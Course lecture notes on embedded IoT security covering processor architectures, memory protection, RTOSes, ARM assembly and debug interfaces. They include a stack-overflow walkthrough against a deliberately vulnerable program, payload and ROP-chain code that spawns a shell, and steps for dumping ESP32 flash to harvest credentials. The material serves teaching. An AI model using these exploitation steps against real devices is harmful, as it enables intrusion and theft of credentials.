CSY304 Week 03 - Embedded security connects directly to earlier foundations:

Opening Framing: The Embedded Reality

IoT security requires understanding the embedded systems that power IoT devices. Unlike general-purpose computers, embedded systems feature specialized processors (ARM Cortex-M, MIPS, Xtensa), run bare-metal code or real-time operating systems, and operate under severe resource constraints. This isn't just academic—these constraints directly create exploitable vulnerabilities.

A smart thermostat might have 256KB of flash and 64KB of RAM. A fitness tracker may run on a battery for months. A security camera processes video on a <$5 ARM Cortex-M4. These constraints shape every security decision—or more often, the compromise. Understanding embedded architecture reveals why certain vulnerabilities exist and how to exploit them.

Why This Week Matters

The Embedded Attack Surface: 75 billion IoT devices are projected by 2025. Every smart home, industrial sensor, and medical device runs embedded code. Understanding ARM assembly isn't optional—it's how you read the firmware you extract, understand exploit mitigation bypasses, and write exploits that actually work on resource-constrained targets.

Real-World Context: Major IoT incidents and vulnerability disclosures (Mirai, VPNFilter, Ripple20) all depended on an understanding of embedded systems to discover and exploit. The URGENT/11 vulnerabilities affected VxWorks across an estimated 200 million devices, and exploiting them required deep embedded knowledge.

Career Relevance: Embedded security specialists are in high demand. Companies building IoT products, automotive systems, and medical devices desperately need engineers who understand both security and embedded constraints.

Learning Outcomes

By the end of this week, you will be able to:

Identify and compare ARM Cortex-M vs Cortex-A architectures
Understand memory layouts and protection mechanisms in embedded systems
Read basic ARM assembly and trace function execution
Recognize common RTOSes (FreeRTOS, Zephyr) and their security properties
Identify debug interfaces (UART, JTAG, SWD) on target boards
Explain why embedded constraints lead to specific vulnerability classes

Real-World Attack Vectors

MITRE ATT&CK for ICS Mapping:

T0819 - Exploit Public-Facing Application: Embedded web servers
T0886 - Remote Services: Debug interfaces left accessible
T0857 - System Firmware: Firmware image tampering

Key insight: Embedded systems trade security for resource efficiency. Every feature removed to save kilobytes of flash is a potential attack vector. Understanding what's missing helps you exploit what's present.

1) Processor Architectures

Understanding processor architectures is fundamental to IoT exploitation. Each architecture has unique characteristics, security features, and typical deployment patterns. Knowing which processor powers a target device tells you what tools to use, what exploits might work, and what defenses you'll encounter.

ARM Cortex-M Series (Microcontrollers)

ARM CORTEX-M DETAILED BREAKDOWN:

┌─────────────────────────────────────────────────────────────┐
│ Cortex-M0/M0+ (Entry-Level):                                │
│ ─────────────────────────────────────────────────────────── │
│ Clock: 50-100 MHz                                           │
│ Flash: 16-256 KB                                            │
│ RAM: 2-32 KB                                                │
│                                                             │
│ Common devices: Smart sensors, Bluetooth beacons,           │
│                 simple wearables                            │
│                                                             │
│ Security features:                                          │
│ - Basic MPU (optional, M0+ only)                            │
│ - No TrustZone                                              │
│ - Limited hardware crypto                                   │
│                                                             │
│ Attack surface: Minimal, often bare-metal code              │
│ Exploitation: Buffer overflows, memory corruption           │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│ Cortex-M3/M4/M4F (Mainstream):                              │
│ ─────────────────────────────────────────────────────────── │
│ Clock: 80-200 MHz                                           │
│ Flash: 128KB - 2MB                                          │
│ RAM: 32KB - 256KB                                           │
│                                                             │
│ Common devices: Fitness trackers, smart thermostats,        │
│                 IoT gateways, drone controllers             │
│                                                             │
│ Security features:                                          │
│ - MPU (8 regions, fully configurable)                       │
│ - Single-precision FPU (M4F only)                           │
│ - Hardware AES: vendor peripheral, not in the core          │
│ - DSP instructions (M4/M4F)                                 │
│ - No TrustZone (pre-v8M architecture)                       │
│                                                             │
│ Example real devices:                                       │
│ - STM32F4 series (drones, 3D printers)                      │
│ - NRF52 (Bluetooth IoT devices)                             │
│ - TI CC26xx (Zigbee devices)                                │
│                                                             │
│ Attack surface: RTOS applications, network stacks           │
│ Exploitation: Stack overflows, integer overflows,           │
│              format strings, ROP chains                     │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│ Cortex-M7 (High Performance):                               │
│ ─────────────────────────────────────────────────────────── │
│ Clock: 400-600 MHz                                          │
│ Flash: 512KB - 2MB                                          │
│ RAM: 256KB - 1MB                                            │
│                                                             │
│ Common devices: Industrial controllers, high-end cameras,   │
│                 automotive infotainment                     │
│                                                             │
│ Security features:                                          │
│ - MPU (16 regions)                                          │
│ - Instruction/data cache (side-channel risks!)              │
│ - Hardware crypto (AES, HASH)                               │
│                                                             │
│ Attack considerations:                                      │
│ - Cache timing side-channels possible                       │
│ - More complex software = more bugs                         │
└─────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────┐
│ Cortex-M23/M33 (ARMv8-M with TrustZone):                    │
│ ─────────────────────────────────────────────────────────── │
│ Released: 2016, still deploying in new designs              │
│                                                             │
│ NEW Security Features:                                      │
│ - TrustZone-M (secure/non-secure world isolation)           │
│ - Security Attribution Unit (SAU)                           │
│ - Secure gateway instructions                               │
│ - Stack limit checking registers                            │
│                                                             │
│ Security architecture:                                      │
│ ┌──────────────────┐     ┌──────────────────┐              │
│ │  Non-Secure      │────▶│  Secure World    │              │
│ │  Application     │ NSC │  (Trusted code)  │              │
│ │  (Normal code)   │◀────│  (Crypto, keys)  │              │
│ └──────────────────┘     └──────────────────┘              │
│                                                             │
│ Common devices: Next-gen IoT security implementations       │
│                                                             │
│ Attack surface:                                             │
│ - TrustZone misconfiguration vulnerabilities                │
│ - Non-secure to secure world transition bugs                │
│ - SAU bypass attempts                                       │
└─────────────────────────────────────────────────────────────┘

ARM Cortex-A Series (Application Processors)

CORTEX-A vs CORTEX-M COMPARISON:

┌─────────────────────────────────────────────────────────────┐
│ Feature           │ Cortex-M         │ Cortex-A            │
│───────────────────┼──────────────────┼─────────────────────│
│ Target Use        │ Microcontroller  │ Application CPU     │
│ Clock Speed       │ 50-600 MHz       │ 800MHz - 2GHz+      │
│ Memory            │ KB scale         │ MB/GB scale         │
│ OS                │ RTOS/bare-metal  │ Linux, Android      │
│ MMU               │ No (MPU only)    │ Yes (full virtual)  │
│ Cache             │ Optional         │ Standard (L1/L2)    │
│ Power             │ Ultra-low        │ Moderate-high       │
│ Cost              │ $1-10            │ $10-100+            │
│ Attack Surface    │ Minimal          │ Large (full OS)     │
└─────────────────────────────────────────────────────────────┘

Cortex-A Series Examples:
┌─────────────────────────────────────────────────────────────┐
│ Cortex-A7/A8:                                               │
│ - IP cameras (Hikvision, Dahua)                            │
│ - Budget routers (TP-Link, D-Link)                         │
│ - Set-top boxes                                             │
│ - Runs Linux 3.x/4.x (often outdated kernels)               │
│                                                             │
│ Cortex-A53:                                                 │
│ - Raspberry Pi 3 (the Pi 4 uses Cortex-A72)                 │
│ - High-end routers                                          │
│ - NAS devices (Synology, QNAP)                              │
│                                                             │
│ Security implications:                                      │
│ - Full Linux attack surface (kernel exploits)               │
│ - Network services (SSH, HTTP, Telnet)                      │
│ - Privilege escalation opportunities                        │
│ - Often running outdated, vulnerable kernels                │
└─────────────────────────────────────────────────────────────┘

MIPS Architecture

MIPS IN IoT DEVICES:

┌─────────────────────────────────────────────────────────────┐
│ Common in legacy and consumer IoT:                          │
│ - Home routers (especially older models)                    │
│ - Set-top boxes                                             │
│ - IP cameras (many Chinese manufacturers)                   │
│ - VoIP phones                                               │
│                                                             │
│ Variations:                                                 │
│ MIPS32: 32-bit (most common in IoT)                         │
│ MIPS64: 64-bit (rare in IoT)                                │
│                                                             │
│ Endianness:                                                 │
│ - Little-endian (EL, mipsel): byte order of x86 hosts       │
│ - Big-endian (EB, mips): network byte order                 │
│ ⚠️ Must match when cross-compiling exploits!                │
│                                                             │
│ Security characteristics:                                   │
│ - No NX bit in older MIPS (shellcode in stack works)        │
│ - Cache architecture enables side-channel attacks           │
│ - Many devices run ancient Linux kernels (2.6.x)            │
│                                                             │
│ Exploitation notes:                                         │
│ - Different calling convention vs ARM/x86                   │
│ - Return address in $ra register                            │
│ - Shellcode must be MIPS assembly                           │
│ - Tools: QEMU MIPS emulation, buildroot for toolchain       │
└─────────────────────────────────────────────────────────────┘
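The endianness warning above can be made concrete with a minimal sketch: the same 32-bit address packs into different byte sequences for big-endian and little-endian MIPS targets. The address used here is a made-up placeholder, not a value from any real device.

```python
import struct

def pack_addr(addr: int, big_endian: bool) -> bytes:
    """Pack a 32-bit address in the byte order the target CPU reads from memory."""
    fmt = ">I" if big_endian else "<I"
    return struct.pack(fmt, addr)

ADDR = 0x7FFF1234  # hypothetical stack address, for illustration only

print(pack_addr(ADDR, big_endian=True).hex())   # 7fff1234
print(pack_addr(ADDR, big_endian=False).hex())  # 3412ff7f
```

A payload packed with the wrong byte order sends the target to a scrambled address, so it is worth confirming the byte order (for example with `file` on an extracted binary) before building anything.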

ESP32/ESP8266 (Xtensa)

ESPRESSIF XTENSA ARCHITECTURE:

┌─────────────────────────────────────────────────────────────┐
│ ESP8266:                                                    │
│ - 80/160 MHz Xtensa L106                                    │
│ - 64 KB instruction RAM, 96 KB data RAM                     │
│ - WiFi 802.11 b/g/n integrated                              │
│ - Ultra low cost ($2-4)                                     │
│ - Massive maker/hobby adoption                              │
│                                                             │
│ Common devices:                                             │
│ - Smart plugs (Sonoff, Tuya)                                │
│ - Smart bulbs                                               │
│ - Environmental sensors                                     │
│ - DIY IoT projects                                          │
│                                                             │
│ ESP32:                                                      │
│ - Dual-core 240 MHz Xtensa LX6                              │
│ - 520 KB SRAM                                               │
│ - WiFi + Bluetooth/BLE integrated                           │
│ - Hardware crypto (AES, SHA, RSA)                           │
│                                                             │
│ Security features (ESP32):                                  │
│ - Secure boot (RSA signature verification)                  │
│ - Flash encryption (AES-256)                                │
│ - Hardware random number generator                          │
│ - Dedicated crypto coprocessor                              │
│                                                             │
│ Common vulnerabilities:                                     │
│ - Hardcoded WiFi credentials in flash                       │
│ - Cleartext firmware updates                                │
│ - Debug pins accessible                                     │
│ - Flash encryption not enabled (default off!)               │
│                                                             │
│ Attack approach:                                            │
│ 1. Physical access → dump flash via UART bootloader         │
│ 2. Extract firmware → binwalk analysis                      │
│ 3. Find WiFi creds, API keys in cleartext                   │
│ 4. OTA update interception (if no signature check)          │
└─────────────────────────────────────────────────────────────┘
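Step 3 of the attack approach (finding cleartext credentials in a dump) can be sketched as a `strings`-style scan. This is a rough illustration only: the keyword list is a guess to tune per target, and the `dump` bytes are synthetic stand-ins for a real flash image.

```python
import re

# Illustrative keywords; real firmware may use entirely different names.
KEYWORDS = (b"ssid", b"pass", b"psk", b"key", b"token")

def printable_strings(blob: bytes, min_len: int = 6):
    """Yield (offset, bytes) for each run of printable ASCII, like `strings`."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob):
        yield m.start(), m.group()

def find_secrets(blob: bytes):
    """Return (offset, text) for printable runs that contain a keyword."""
    hits = []
    for off, s in printable_strings(blob):
        if any(k in s.lower() for k in KEYWORDS):
            hits.append((off, s.decode("ascii")))
    return hits

# Synthetic stand-in for a flash dump.
dump = (b"\xff" * 16 + b"wifi_ssid=HomeNet\x00" + b"\x00" * 8
        + b"wifi_pass=hunter2\x00" + b"\xe9\x03\x02\x20")

for off, text in find_secrets(dump):
    print(hex(off), text)
```

For a real image, replace `dump` with the bytes read from the dumped file. If flash encryption is enabled, a scan like this should find nothing readable.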

Architecture Selection and Security Impact

CHOOSING ARCHITECTURE FOR SECURITY:

┌─────────────────────────────────────────────────────────────┐
│ Security Tier 1: High Security Requirements                 │
│ (Medical devices, automotive, industrial)                   │
│                                                             │
│ Recommended:                                                │
│ - ARM Cortex-M33/M35P (TrustZone-M)                         │
│ - Cortex-A with TrustZone-A                                 │
│                                                             │
│ Features needed:                                            │
│ ✓ Hardware isolation (TrustZone)                            │
│ ✓ Secure boot mandatory                                     │
│ ✓ Hardware crypto acceleration                              │
│ ✓ Secure firmware updates                                   │
│ ✓ Physical attack resistance                                │
│                                                             │
│ Security Tier 2: Moderate Security                          │
│ (Smart home, wearables, consumer IoT)                       │
│                                                             │
│ Recommended:                                                │
│ - ARM Cortex-M4/M7 with MPU                                 │
│ - ESP32 with secure boot + flash encryption                 │
│                                                             │
│ Features needed:                                            │
│ ✓ MPU for memory protection                                 │
│ ✓ Encrypted storage option                                  │
│ ✓ Signed firmware updates                                   │
│ ⚠ TrustZone not critical but beneficial                     │
│                                                             │
│ Security Tier 3: Cost-Optimized                             │
│ (Disposable sensors, simple devices)                        │
│                                                             │
│ Acceptable:                                                 │
│ - ARM Cortex-M0+                                            │
│ - ESP8266                                                   │
│                                                             │
│ Minimal features:                                           │
│ ✓ Input validation in code                                  │
│ ✓ Basic authentication                                      │
│ ⚠ Accept higher risk for lower cost                         │
└─────────────────────────────────────────────────────────────┘

2) Memory and Storage

EMBEDDED MEMORY ARCHITECTURE:

MEMORY TYPES:
┌─────────────────────────────────────────────────────────────┐
│ Flash (Non-volatile):                                       │
│ - Stores firmware/code                                      │
│ - Survives power cycles                                     │
│ - Limited write cycles (wear leveling)                      │
│ - Often externally accessible (attack target)               │
│                                                             │
│ RAM (Volatile):                                             │
│ - Runtime data, stack, heap                                 │
│ - Kilobytes to megabytes                                    │
│ - Contains secrets during operation                         │
│                                                             │
│ EEPROM:                                                     │
│ - Configuration storage                                     │
│ - WiFi credentials, calibration data                        │
│ - Often unencrypted                                         │
│                                                             │
│ External Storage:                                           │
│ - SD cards, SPI flash chips                                 │
│ - Easily removed and analyzed                               │
└─────────────────────────────────────────────────────────────┘

MEMORY PROTECTION:
┌─────────────────────────────────────────────────────────────┐
│ MPU (Memory Protection Unit):                               │
│ - Defines memory region permissions                         │
│ - Execute/read/write controls                               │
│ - Can prevent code execution from RAM                       │
│ - Often unused in simple devices                            │
│                                                             │
│ Common Weaknesses:                                          │
│ - No MPU configured (everything accessible)                 │
│ - Stack/heap in executable memory                           │
│ - No ASLR (addresses predictable)                           │
│ - No stack canaries                                         │
└─────────────────────────────────────────────────────────────┘
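The "stack/heap in executable memory" weakness can be checked mechanically once a memory map is known. The sketch below flags regions that are both writable and executable. The two maps are illustrative, loosely modelled on a Cortex-M part, and are not taken from any datasheet.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Region:
    name: str
    base: int
    size: int
    perms: str  # any subset of "rwx"

def wx_violations(regions):
    """Return regions that are both writable and executable."""
    return [r for r in regions if "w" in r.perms and "x" in r.perms]

# Hypothetical maps for illustration only.
no_mpu = [
    Region("flash", 0x0800_0000, 512 * 1024, "rx"),
    Region("sram", 0x2000_0000, 128 * 1024, "rwx"),  # RAM left executable
]
with_mpu = [
    Region("flash", 0x0800_0000, 512 * 1024, "rx"),
    Region("sram", 0x2000_0000, 128 * 1024, "rw"),   # MPU marks RAM execute-never
]

print([r.name for r in wx_violations(no_mpu)])    # ['sram']
print([r.name for r in wx_violations(with_mpu)])  # []
```

A writable and executable RAM region is what lets injected shellcode run directly. Removing the execute permission pushes an attacker toward code-reuse techniques instead.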

3) Real-Time Operating Systems

COMMON IoT OPERATING SYSTEMS:

BARE METAL (No OS):
┌─────────────────────────────────────────────────────────────┐
│ - Direct hardware access                                    │
│ - Simple interrupt-driven loops                             │
│ - Minimal attack surface                                    │
│ - No process isolation                                      │
│ - Common in simple sensors                                  │
└─────────────────────────────────────────────────────────────┘

FreeRTOS:
┌─────────────────────────────────────────────────────────────┐
│ - Most popular RTOS for microcontrollers                    │
│ - AWS IoT integration                                       │
│ - Task scheduling, queues, semaphores                       │
│ - No memory protection between tasks by default             │
│ - TLS and crypto libraries available                        │
└─────────────────────────────────────────────────────────────┘

Zephyr:
┌─────────────────────────────────────────────────────────────┐
│ - Linux Foundation project                                  │
│ - Strong security focus                                     │
│ - Memory protection, secure boot support                    │
│ - Growing adoption in commercial IoT                        │
└─────────────────────────────────────────────────────────────┘

Embedded Linux:
┌─────────────────────────────────────────────────────────────┐
│ - Full Linux kernel on Cortex-A or MIPS                     │
│ - Familiar attack vectors (buffer overflows, privesc)       │
│ - BusyBox common (minimal userland)                         │
│ - Often outdated kernels with known CVEs                    │
└─────────────────────────────────────────────────────────────┘

4) ARM Assembly Basics

ARM assembly fluency is non-negotiable for IoT exploitation. You need to read disassembly to understand what firmware does, write shellcode to exploit vulnerabilities, and build ROP chains to bypass protections. This section covers the essentials through a practical exploitation lens.

Registers and Calling Convention

ARM ASSEMBLY FUNDAMENTALS:

REGISTERS (ARM Cortex-M):
┌─────────────────────────────────────────────────────────────┐
│ R0-R12: General purpose                                     │
│ R13 (SP): Stack Pointer                                     │
│ R14 (LR): Link Register (return address)                    │
│ R15 (PC): Program Counter                                   │
│ xPSR: Program Status Register (flags; CPSR on Cortex-A)     │
│                                                             │
│ FUNCTION CALLING CONVENTION (AAPCS):                        │
│ Arguments: R0, R1, R2, R3 (then stack)                      │
│ Return value: R0                                            │
│ Callee-saved: R4-R11 (must preserve)                        │
│ Caller-saved: R0-R3, R12 (can be clobbered)                 │
└─────────────────────────────────────────────────────────────┘
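As a quick illustration of the calling convention above, this sketch maps argument positions to their locations at the moment of the call. It assumes every argument is a word-sized integer or pointer; 64-bit and floating-point arguments follow extra rules that are not modelled here.

```python
def place_args(n_args: int):
    """Map the first n word-sized arguments to their AAPCS locations."""
    locations = []
    for i in range(n_args):
        if i < 4:
            locations.append(f"R{i}")                   # first four go in registers
        else:
            locations.append(f"[SP, #{(i - 4) * 4}]")   # the rest spill to the stack
    return locations

print(place_args(6))
# ['R0', 'R1', 'R2', 'R3', '[SP, #0]', '[SP, #4]']
```

When reading disassembly, this is why the values loaded into R0-R3 just before a `BL` are usually the arguments to the function being called.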

COMMON INSTRUCTIONS:
┌─────────────────────────────────────────────────────────────┐
│ Data Movement:                                              │
│ MOV R0, #5       ; R0 = 5 (immediate value)                │
│ MOV R0, R1       ; R0 = R1 (register to register)          │
│                                                             │
│ Arithmetic:                                                 │
│ ADD R0, R1, R2   ; R0 = R1 + R2                             │
│ SUB R0, R1, #10  ; R0 = R1 - 10                             │
│ MUL R0, R1, R2   ; R0 = R1 * R2                             │
│                                                             │
│ Memory Access:                                              │
│ LDR R0, [R1]     ; Load word from memory @ R1 into R0      │
│ LDR R0, [R1, #4] ; Load from R1 + 4 offset                  │
│ STR R0, [R1]     ; Store R0 to memory @ R1                  │
│ LDRB R0, [R1]    ; Load byte (8-bit)                        │
│                                                             │
│ Comparison & Branching:                                     │
│ CMP R0, R1       ; Compare R0 and R1 (set flags)            │
│ BEQ label        ; Branch if equal (Z flag set)             │
│ BNE label        ; Branch if not equal                      │
│ BGT label        ; Branch if greater than                   │
│ B label          ; Unconditional branch (goto)              │
│                                                             │
│ Function Calls:                                             │
│ BL function      ; Branch with link (call function)         │
│                   ; Saves return addr in LR, jumps to func  │
│ BX LR            ; Branch exchange, return from function   │
│                                                             │
│ Stack Operations:                                           │
│ PUSH {R4-R7, LR} ; Save registers to stack                  │
│ POP {R4-R7, PC}  ; Restore and return (PC = LR)             │
└─────────────────────────────────────────────────────────────┘
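To practise tracing, a toy interpreter for the data-movement and arithmetic instructions listed above can help. This is a teaching sketch under heavy assumptions: it handles only MOV, ADD, SUB, and MUL with register or immediate operands, and it ignores flags, memory access, and branches.

```python
def operand(tok: str, regs: dict) -> int:
    """Resolve '#imm' or a register name to its integer value."""
    tok = tok.strip()
    return int(tok[1:], 0) if tok.startswith("#") else regs[tok.upper()]

def trace(program: str) -> dict:
    """Execute a straight-line program and print each register update."""
    regs = {f"R{i}": 0 for i in range(13)}
    for raw in program.strip().splitlines():
        line = raw.split(";")[0].strip()          # drop comments
        if not line:
            continue
        op, rest = line.split(None, 1)
        args = [a.strip() for a in rest.split(",")]
        dst, op = args[0].upper(), op.upper()
        if op == "MOV":
            val = operand(args[1], regs)
        elif op == "ADD":
            val = operand(args[1], regs) + operand(args[2], regs)
        elif op == "SUB":
            val = operand(args[1], regs) - operand(args[2], regs)
        elif op == "MUL":
            val = operand(args[1], regs) * operand(args[2], regs)
        else:
            raise ValueError(f"unsupported instruction: {op}")
        regs[dst] = val & 0xFFFFFFFF              # registers are 32 bits wide
        print(f"{line:<18} -> {dst} = {regs[dst]}")
    return regs

regs = trace("""
    MOV R1, #5
    MOV R2, #7
    ADD R0, R1, R2    ; R0 = 12
    SUB R0, R0, #10   ; R0 = 2
    MUL R0, R0, R2    ; R0 = 14
""")
```

Working through a listing by hand first and then comparing against the trace is a reasonable way to build reading fluency before moving on to real disassembly.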

Stack Buffer Overflow Exploitation

COMPLETE EXPLOITATION WALKTHROUGH:

Vulnerable C Code:
┌─────────────────────────────────────────────────────────────┐
│ #include <stdio.h>                                          │
│ #include <string.h>                                         │
│                                                             │
│ void vulnerable_function(char *input) {                     │
│     char buffer[64];                                        │
│     strcpy(buffer, input);  // No bounds check!             │
│     printf("You entered: %s\n", buffer);                     │
│ }                                                           │
│                                                             │
│ int main(int argc, char **argv) {                           │
│     if (argc < 2) return 1;                                 │
│     vulnerable_function(argv[1]);                           │
│     return 0;                                               │
│ }                                                           │
└─────────────────────────────────────────────────────────────┘

Compile for ARM (disable protections):
$ arm-linux-gnueabi-gcc -g -fno-stack-protector -z execstack \
  -o vuln vuln.c

Generated ARM Assembly (vulnerable_function):
┌─────────────────────────────────────────────────────────────┐
│ vulnerable_function:                                        │
│     PUSH {R4, LR}         ; Save R4 and return address      │
│     SUB SP, SP, #72       ; Allocate 72 bytes on stack      │
│     MOV R4, R0            ; Save input pointer to R4        │
│     ADD R0, SP, #8        ; R0 = &buffer (SP+8)             │
│     MOV R1, R4            ; R1 = input                      │
│     BL strcpy             ; Call strcpy (VULNERABLE!)       │
│     ... (printf call)                                       │
│     ADD SP, SP, #72       ; Deallocate stack                │
│     POP {R4, PC}          ; Restore R4 and return (PC=LR)   │
└─────────────────────────────────────────────────────────────┘

Stack Layout After PUSH and SUB:
┌─────────────────────────────────────────────────────────────┐
│ High Memory                                                 │
│ ┌───────────────────────────────────────────────────────┐ │
│ │ Saved LR (return address) ← TARGET!                  │ │
│ ├───────────────────────────────────────────────────────┤ │
│ │ Saved R4                                              │ │
│ ├───────────────────────────────────────────────────────┤ │
│ │ 72 bytes local storage                                │ │
│ │ (buffer starts at SP+8, 64 bytes)                     │ │
│ └───────────────────────────────────────────────────────┘ │
│ Low Memory (SP points here after SUB)                       │
└─────────────────────────────────────────────────────────────┘

Exploitation Strategy:
1. Buffer is 64 bytes at SP+8
2. Saved R4 is at SP+72 and saved LR is at SP+76, which puts LR 68 bytes past the start of the buffer (64-byte buffer + 4 bytes of saved R4)
3. strcpy will overflow buffer, overwriting saved LR
4. When function returns (POP {R4, PC}), PC gets our value
5. We control program flow!

Building the Exploit:
┌─────────────────────────────────────────────────────────────┐
│ Payload structure:                                          │
│                                                             │
│ [      64 bytes padding       ]  Fill buffer               │
│ [    4 bytes junk for R4      ]  Overwrite saved R4        │
│ [    4 bytes return address   ]  Overwrite saved LR        │
│                                                             │
│ Example Python exploit:                                     │
│ from pwn import p32  # pwntools little-endian packer        │
│ payload = b"A" * 64              # Fill buffer             │
│ payload += b"BBBB"                # Junk for R4            │
│ payload += p32(0xdeadbeef)        # New return address     │
└─────────────────────────────────────────────────────────────┘
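The payload layout can also be derived from the disassembly rather than counted by hand. The sketch below uses only the standard library and takes its constants from the listing of `vulnerable_function` above. The return address is the same placeholder used in the text, not a real target.

```python
import struct

LOCALS = 72            # SUB SP, SP, #72
BUF_OFFSET = 8         # ADD R0, SP, #8  (buffer starts at SP+8)
PUSHED = ["R4", "LR"]  # PUSH {R4, LR}: lowest-numbered register at lowest address

def offset_to(reg: str) -> int:
    """Bytes from the start of the buffer to the saved copy of `reg`."""
    return (LOCALS - BUF_OFFSET) + 4 * PUSHED.index(reg)

def build_payload(ret_addr: int) -> bytes:
    payload = b"A" * offset_to("R4")                        # fill the 64-byte buffer
    payload += b"B" * (offset_to("LR") - offset_to("R4"))   # clobber saved R4
    payload += struct.pack("<I", ret_addr)                  # new PC, little-endian
    return payload

payload = build_payload(0xDEADBEEF)   # placeholder address
print(offset_to("LR"), len(payload))  # 68 72
```

Because `strcpy` stops at the first zero byte, a real return address must not contain `0x00` in any of its four bytes, otherwise the copy ends before the overwrite completes.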

GDB Debugging Workflow:
$ gdb-multiarch ./vuln
(gdb) set architecture arm
(gdb) disassemble vulnerable_function
# Identify offset to saved LR

(gdb) run $(python3 -c 'print("A"*68 + "BBBB")')
# Program crashes with PC=0x42424242 ("BBBB")
# Confirms we control PC!

(gdb) x/20x $sp
# Examine stack to verify overwrite

Next step: Write ARM shellcode or ROP chain to gain code execution
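When the offset is not known in advance, a non-repeating pattern can replace the run of "A" bytes so that the value landing in PC identifies its own position. The following is a minimal standard-library sketch of that idea (tools such as pwntools ship their own pattern generators). The function names are hypothetical.

```python
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def pattern(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern whose 4-byte windows do not repeat."""
    out = []
    for u, l, d in product(ascii_uppercase, ascii_lowercase, digits):
        out.append(u + l + d)
        if 3 * len(out) >= length:
            break
    return "".join(out)[:length].encode()

def offset_of(pc_value: int, length: int = 200) -> int:
    """Find where the 4 bytes that reached PC sit in the pattern (-1 if absent)."""
    return pattern(length).find(pc_value.to_bytes(4, "little"))

# Simulate the crash: with LR 68 bytes into the input, PC receives these bytes.
crashed_pc = int.from_bytes(pattern(200)[68:72], "little")
print(offset_of(crashed_pc))  # 68
```

On real hardware the debugger may report PC with its lowest bit cleared, since that bit selects Thumb state, so if an exact lookup returns -1 it is worth retrying with `pc_value | 1`.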

Return-Oriented Programming (ROP)

ROP EXPLOITATION ON ARM:

Why ROP?
┌─────────────────────────────────────────────────────────────┐
│ - Stack is non-executable (NX bit enabled)                  │
│ - Can't execute shellcode on stack                          │
│ - Solution: Chain existing code "gadgets"                   │
│ - Each gadget ends with BX LR or POP {PC}                   │
└─────────────────────────────────────────────────────────────┘

Finding Gadgets:
$ ROPgadget --binary ./vuln

Useful ARM Gadgets:
┌─────────────────────────────────────────────────────────────┐
│ 0x00010420: pop {r0, pc}         ; Load R0 from stack       │
│ 0x00010538: pop {r3, pc}         ; Load R3 from stack       │
│ 0x000106a0: mov r0, r4; blx r3   ; Call function in R3      │
│ 0x00010750: ldr r0, [r4]; bx lr  ; Deref pointer in R4      │
└─────────────────────────────────────────────────────────────┘

ROP Chain Example (call system("/bin/sh")):
┌─────────────────────────────────────────────────────────────┐
│ Goal: Execute system("/bin/sh")                             │
│                                                             │
│ ROP payload:                                                │
│ [padding] + [saved R4] + [ROP chain on stack]               │
│                                                             │
│ payload = b"A" * 64                                         │
│ payload += b"JUNK"           #  Saved R4                     │
│ payload += p32(pop_r0)       #  PC → pop {r0, pc}           │
│ payload += p32(binsh_addr)   #  R0 = "/bin/sh"              │
│ payload += p32(system_addr)  #  PC → system()              │
│                                                             │
│ Execution flow:                                             │
│ 1. Function returns, PC = pop_r0 gadget                     │
│ 2. Gadget pops binsh_addr into R0, then pops system_addr     │
│    into PC                                                   │
│ 3. Now executing system() with R0 = "/bin/sh"                │
│ 4. Shell spawned!                                           │
└─────────────────────────────────────────────────────────────┘
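The execution flow above can be replayed offline to confirm that the stack words line up before the chain is tried on a target. In this sketch `POP_R0_PC` is the gadget address from the listing, while `BINSH_ADDR` and `SYSTEM_ADDR` are invented placeholders. Real values would come from the gadget search and the target's libc.

```python
import struct

POP_R0_PC = 0x00010420    # pop {r0, pc} gadget from the listing above
BINSH_ADDR = 0x0002A000   # placeholder: address of a "/bin/sh" string
SYSTEM_ADDR = 0x00030000  # placeholder: address of system()

def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian word (stand-in for pwntools' p32)."""
    return struct.pack("<I", value)

payload = b"A" * 64 + b"JUNK" + p32(POP_R0_PC) + p32(BINSH_ADDR) + p32(SYSTEM_ADDR)

def simulate(payload: bytes, buf_to_r4: int = 64) -> dict:
    """Replay POP {R4, PC} followed by pop {r0, pc} over the overwritten stack."""
    words = struct.unpack_from("<4I", payload, buf_to_r4)
    regs = {}
    regs["R4"], regs["PC"] = words[0], words[1]   # function epilogue
    if regs["PC"] != POP_R0_PC:
        raise ValueError("return address does not point at the gadget")
    regs["R0"], regs["PC"] = words[2], words[3]   # gadget: pop {r0, pc}
    return regs

regs = simulate(payload)
print(hex(regs["R0"]), hex(regs["PC"]))  # 0x2a000 0x30000
```

This checks layout only. Addresses containing zero bytes, like the placeholders here, would be cut short by `strcpy` in the vulnerable program, so a working chain needs addresses free of `0x00` or a different copy primitive.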

5) Debug Interfaces

HARDWARE DEBUG INTERFACES:

UART (Universal Asynchronous Receiver/Transmitter):
┌─────────────────────────────────────────────────────────────┐
│ Purpose: Serial console access                              │
│ Pins: TX, RX, GND (sometimes VCC)                           │
│ Baud rates: 9600, 115200 common                             │
│                                                             │
│ Security Value:                                             │
│ - Often provides root shell                                 │
│ - Boot logs reveal system information                       │
│ - May allow bootloader interrupt                            │
│                                                             │
│ Identification:                                             │
│ - Look for 4-pin headers on PCB                             │
│ - Use logic analyzer to detect baud rate                    │
│ - JTAGulator can automate pin identification                │
└─────────────────────────────────────────────────────────────┘
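
Detecting the baud rate with a logic analyzer comes down to simple arithmetic: the shortest pulse on the TX line is roughly one bit time, and the baud rate is its reciprocal. The sketch below assumes you have exported pulse widths in microseconds from a capture; the function name and the list of candidate rates are illustrative choices, not part of any particular tool.

```python
STANDARD_BAUD_RATES = (
    1200, 2400, 4800, 9600, 19200, 38400,
    57600, 115200, 230400, 460800, 921600,
)


def estimate_baud(pulse_widths_us):
    """Estimate a UART baud rate from pulse widths measured in microseconds."""
    if not pulse_widths_us:
        raise ValueError("need at least one pulse width")
    bit_time_us = min(pulse_widths_us)  # shortest pulse is about one bit
    if bit_time_us <= 0:
        raise ValueError("pulse widths must be positive")
    raw_rate = 1_000_000 / bit_time_us  # bits per second
    # Snap to the closest common rate to absorb measurement error.
    return min(STANDARD_BAUD_RATES, key=lambda rate: abs(rate - raw_rate))


print(estimate_baud([8.7, 17.4, 26.1, 8.7]))
print(estimate_baud([104.2, 208.3, 104.1]))
```
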